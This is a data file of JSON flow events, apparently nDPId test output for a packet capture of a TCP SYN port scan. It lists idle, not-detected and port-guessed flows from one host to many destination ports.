+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1244,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058031,"flow_last_seen":1278275058031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1247,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058031,"flow_last_seen":1278275058031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1247,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1248,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1248,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1247,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1247,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":652,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1248,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":652,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1248,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3300,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3300,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":505,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3301,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":505,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":526,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3301,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":526,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1698,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7402,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1698,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7402,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3306,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"MySQL","breed":"Acceptable","category":"Database"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3306,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7402,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7402,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1259,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1259,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3306,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"MySQL","breed":"Acceptable","category":"Database"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3306,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":561,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059406,"flow_last_seen":1278275059406,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1259,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":561,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059406,"flow_last_seen":1278275059406,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1259,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1681,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060969,"flow_last_seen":1278275060969,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5357,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1681,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060969,"flow_last_seen":1278275060969,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5357,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1756,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061071,"flow_last_seen":1278275061071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5357,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1756,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061071,"flow_last_seen":1278275061071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5357,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":697,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1271,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":697,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1271,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1272,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1272,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":750,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1271,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":750,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1271,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1272,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1272,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1375,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3322,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1375,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3322,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1444,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060643,"flow_last_seen":1278275060643,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3322,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1444,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060643,"flow_last_seen":1278275060643,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3322,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1386,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3323,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1386,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3323,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 